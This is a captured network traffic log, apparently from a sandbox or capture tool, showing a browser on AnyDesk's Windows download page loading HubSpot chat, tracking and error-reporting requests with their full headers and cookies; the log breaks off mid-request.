set-cookie: __cf_bm=AiRjANBg39jH89doKIcUPfbyVJt.OeCjgwHxF2rfQ_E-1728144498-1.0.1.1-HRrNeHUXsiCEJApV0ALvpR6gxf_ckIhEcz9aQzO5.zesBECVQT4AyFrjVKM.V2YGPN3yEiVd3qp9e2J.l01z0Q; path=/; expires=Sat, 05-Oct-24 16:38:18 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzrLQl7OFwHthB%2B4mmJoByqKVDvKO08CZbJ6jmYjtMnuVJMt39OoXMxY%2FQ5ckNFAQkQmOCeODFPoar1KEykRexEtRWVkpFnaRb6nrzTllJfz8Ng07p6YDi7tHCSCi%2BIJKmyNbXXKbdAzZE%2FOcpI%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=TnpEXUq8krFrwUvbo1YMgJ52b6KM5LXJ_0oLpjfyrCU-1728144498295-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab683e450bad-AMS
content-encoding: br
GET

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&traceId=c08b002be84840e4bf63c5e98ea0ad79&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&traceId=c08b002be84840e4bf63c5e98ea0ad79&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: api.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
sec-ch-ua-mobile: ?0
x-hubspot-messages-uri: https://anydesk.com/en/downloads/windows
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:18 GMT
content-type: image/gif
content-length: 45
cf-ray: 8cdeab6a49290bad-AMS
cf-cache-status: DYNAMIC
cache-control: no-cache, no-store, no-transform
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-content-type-options: nosniff
x-envoy-upstream-service-time: 3
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/analytics-tracking-td/envoy-proxy-689db97f95-rln29
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 70cdce03-1566-491e-a39c-115f5aa51279
x-request-id: 70cdce03-1566-491e-a39c-115f5aa51279
x-robots-tag: none
set-cookie: __cf_bm=VZfW.9kLyevNjwgix8acfm.O2cpGksVTx83N_wmNoVs-1728144498-1.0.1.1-dM3AvRz90xBhs1Fe19mpSHuD87zYaxImY3j_4lXarmyg8ekjBhvSjeUc2bKKFEUHrSV_rdOVEQq.mwph8jfLJQ; path=/; expires=Sat, 05-Oct-24 16:38:18 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cT7EIJH65cRKvAZCeuneKnGTOiygrRtnTkAw%2BrNJlEIQwe2ioGEFYCj0rSkflqijfMztgwZ85OIV%2FVr%2F5Y09pt5ddiYJM70Ye342i1%2BCpL7jSrRzt%2BHj7U6a4AFDYdtOmNfA"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=6i8yV4ehZQMlQCAa05sEW2ag9J1sJJ5N_090_bI7fYU-1728144498405-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&t=Remote+Desktop+Software+for+Windows+%E2%80%93+AnyDesk&cts=1728144497602&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.3.1728144483689&cc=15

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&t=Remote+Desktop+Software+for+Windows+%E2%80%93+AnyDesk&cts=1728144497602&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.3.1728144483689&cc=15 HTTP/2.0
host: track.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:18 GMT
content-type: application/json;charset=utf-8
content-length: 1489
cf-ray: 8cdeab6a49240bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
cache-control: no-cache, no-store, no-transform, must-revalidate, max-age=0
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 9d8d6f4d-fa06-4ea0-b210-81cd8911be92
set-cookie: __cf_bm=UVCzqSKcfrNOklkiSW6SvJkmR7OiE_VCUWYBG2tkmTk-1728144498-1.0.1.1-cqxDnVw8IAYs8rFfv7vfcaxXjwTeiqDtdvjRH9j83yawFVY_xSAkKiPmOralI7r6.Abs5A24w_1Tt8b3XapsvQ; path=/; expires=Sat, 05-Oct-24 16:38:18 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HIfAYdjoL0JvqGZFBV%2Bu5yoa1A4TFzMRaNodOViRc%2FwthtEQSNMmu3GOkVVWKVjuNl5bFV%2BfQKvAqiQRK4YN8MRIOHgATvW2LNB0wc8kJoVyYE6ZVK3JUdJ%2FKCDkr8WxRg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=YgTd7.7HXYxoI3CM0bWZYrTlwW3JKrOAyzVpiI3z8ts-1728144498638-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/conversations-visitor/7940397/threads/utk/c08b002be84840e4bf63c5e98ea0ad79?uuid=905453b86c4542a58acfea7db80e8d30&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /conversations-visitor/7940397/threads/utk/c08b002be84840e4bf63c5e98ea0ad79?uuid=905453b86c4542a58acfea7db80e8d30&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:18 GMT
content-type: text/html; charset=utf-8
cf-ray: 8cdeab6d9d1e0bad-AMS
cf-cache-status: DYNAMIC
age: 2275
cache-control: max-age=600
content-encoding: gzip
etag: W/"92cfcc4f73d45a74e3aa5782ce9dc842"
last-modified: Tue, 01 Oct 2024 19:53:43 UTC
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
via: 1.1 b77313059f3d50280ced20238b151620.cloudfront.net (CloudFront)
access-control-allow-credentials: false
cache-tag: staticjsapp-conversations-visitor-ui-web-prod,staticjsapp-prod
content-security-policy-report-only: script-src 'self' www.hubspot.com *.hsappstatic.net *.hs-analytics.net *.hs-banner.com *.hsforms.net *.hsleadflows.net *.hs-scripts.com *.hubspotfeedback.com *.usemessages.com js.hubspot.com *.hsadspixel.net *.hscollectedforms.net js-agent.newrelic.com bam.nr-data.net bam-cell.nr-data.net *.google-analytics.com www.googletagmanager.com data: 'unsafe-inline' 'unsafe-eval' blob: connect.facebook.net www.gstatic.cn www.gstatic.com www.google.com www.recaptcha.net *.fullstory.com fullstory.com apis.google.com snap.licdn.com; report-uri https://send.hsbrowserreports.com/csp/report?resource=conversations-visitor-ui/static-1.20626/html/index.html&cfRay=8cdeab6d9d1e0bad&reqUrl=https%3A%2F%2Fapp.hubspot.com%2Fconversations-visitor%2F7940397%2Fthreads%2Futk%2Fc08b002be84840e4bf63c5e98ea0ad79%3Fuuid%3D905453b86c4542a58acfea7db80e8d30%26mobile%3Dfalse%26mobileSafari%3Dfalse%26hideWelcomeMessage%3Dfalse%26hstc%3D261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1%26domain%3Danydesk.com%26inApp53%3Dfalse%26messagesUtk%3Dc08b002be84840e4bf63c5e98ea0ad79%26url%3Dhttps%253A%252F%252Fanydesk.com%252Fen%252Fdownloads%252Fwindows%26inline%3Dfalse%26isFullscreen%3Dfalse%26globalCookieOptOut%3D%26isFirstVisitorSession%3Dtrue%26isAttachmentDisabled%3Dfalse%26isInitialInputFocusDisabled%3Dfalse%26enableWidgetCookieBanner%3Dfalse%26isInCMS%3Dfalse%26hideScrollToButton%3Dtrue%26isIOSMobile%3Dfalse%26hubspotUtk%3Da5b3d1933284be27e3a7527fad5a6a3f&referrer=https%3A%2F%2Fanydesk.com%2F&cfenv=prod&pdt=2024-10-05&csp=ro
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://send.hsbrowserreports.com/csp/reports"}]}
reporting-endpoints: default="https://send.hsbrowserreports.com/csp/reports?cfRay=8cdeab6d9d1e0bad&resource=conversations-visitor-ui/static-1.20626/html/index.html"
x-amz-cf-id: v0-Fywo3zjNwWSsRo0RYR4D4A41spfADNr6zYmZ0esP0m7j_vLGHIw==
x-amz-cf-pop: IAD12-P3
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-version-id: hVkVcK8l8m_IHBKUGh9hahU3mPpZRmCl
x-cache: Hit from cloudfront
x-content-type-options: no-sniff
x-envoy-upstream-service-time: 4
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-6c6dd6864-c64nq
x-evy-trace-virtual-host: all
x-hs-cache-status: MISS
x-hs-target-asset: conversations-visitor-ui/static-1.20626/html/index.html
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: 65e9fc24-1cf9-4826-9da2-a32b0bcbd190
x-request-id: 65e9fc24-1cf9-4826-9da2-a32b0bcbd190
set-cookie: __cf_bm=xVZdw1LDNVI0hngShRMN5YfPgOl_Ir7bzZlVqQJPCB4-1728144498-1.0.1.1-ZOyhn_HdL9oc2C44zjzP4VON.fTAQSv7chD618hWnMyDmrcK8Di8lByzneh7di9eGQzBA.GtJcvRXkZFmGYlQw; path=/; expires=Sat, 05-Oct-24 16:38:18 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
set-cookie: _cfuvid=svU4.Sf8.KTZ3BYYHy4x_hKAYWI0MA4fR.G41MKjaEk-1728144498958-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2367
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:19 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 13
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: deecde53-b87b-43d1-9d6f-7bf21fff3d12
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-m2z4r
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: deecde53-b87b-43d1-9d6f-7bf21fff3d12
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=.NzFPb9dfYiewO2s0q6FNEgVthNxVzUd5HQ5kRkpF6A-1728144499-1.0.1.1-87r29SOONhOJDhVS0wV9iLb4KRRtzOi06b20FJyIAXHGIJdgSJz0xoJDIC0v_Fs_DPvhSD66GfFrFVxoPD8FBw; path=/; expires=Sat, 05-Oct-24 16:38:19 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JrZG5V7TlSyXcFuWcSJwEzJNUdpUuIRYtfaTu1ooQ%2F98rJkOhgRXqrkF5FxU3AZ2MwOKJRNRBTkw70UE5UXGRWpZNd63SQ0EIJaknioPhATjpulQjiNBRaTQN0jsyiu1egy5AIH0fqw%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=OSepMgXLPRsIU.w_LqKwyQ1J.PV4GOqpQNSYDpyJYRs-1728144499344-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab70289c0bad-AMS
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2067
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:19 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 16
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 7b50d412-587e-48ae-9f4f-d436f3904516
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-f56vg
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 7b50d412-587e-48ae-9f4f-d436f3904516
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=CKUVufcXJSjasdvl7qRm8hNgK.PW4ERfszZrGGFJWzE-1728144499-1.0.1.1-sy5IG2wXLBMzyOmXFEiBkyZPcMSt.m08cOagg58WJoHTp0D_UvA9FEd242Ee4olrUF3Icmziy.FFjlr0NIPZEQ; path=/; expires=Sat, 05-Oct-24 16:38:19 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUcZgZIVv%2BVgqwm7Q6slEIE3U78PJkl7BeRvJfn%2BboWdMagg14fx4m%2BXlTkNvabRbkGogUtcigJV4aWvQAdJfF%2B8tcGKooErAp6UPAaRXU4mg6mvKsxnohPyiZk%2FlPsIHgC28eyNpts%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=l9puHiiRbzdovxFxcFurWc48OlBgQ_bh6Mpq_3uSkBI-1728144499374-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab7028a00bad-AMS
POST

https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 407
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/c08b002be84840e4bf63c5e98ea0ad79?uuid=905453b86c4542a58acfea7db80e8d30&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:19 GMT
cf-ray: 8cdeab7058ea0bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=779c3285-5bee-4a67-9608-b557f8653a82
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 779c3285-5bee-4a67-9608-b557f8653a82
set-cookie: __cf_bm=FTPhh9svjq.rC8rHFzHDq7hn2ifDDKT9Z5i3BFMFYmw-1728144499-1.0.1.1-oB91gQFYYYms1FGsE0yuiTdXXMTrXNSP3eyA0p9nxtIf_Pbefv7P2QEJ6YJgRnJvOpAUIAXv1WShqRLAcaJe1g; path=/; expires=Sat, 05-Oct-24 16:38:19 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l399s7PHr2idSXQ6oXZcZRt0xgMjZ9dFhTGNfgD3NPR3P5AUEXonrr1Pi5j3JaFE6A%2BGTkHtUFGraXzrE2I2dRnCzMMBEm%2BosKG5nSy19bNEYbce1BuO1Yi05N6A1kHvWg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=XHqXVvlT4uqZ1RyouG9DKdot099bvyjLK8Z1nzzeuFo-1728144499377-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=c08b002be84840e4bf63c5e98ea0ad79&sessionId=AMOaWbJF-0X466NZJUYCUmi7wqCtj8AxLECR1JWKS-NiJL6usKc5tKtppTGrRpRQlo1ZPdlaG7j-0PZ-Fj4Mse_sWjAURfyPaVENfaYw0WL1dguK1Zq1UobyhA8vyPDKREjsissVUDU2e8XjXeYjLaNdCE9kE6_i1IkiwW9Qb1wZFxDXFnwDM24&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

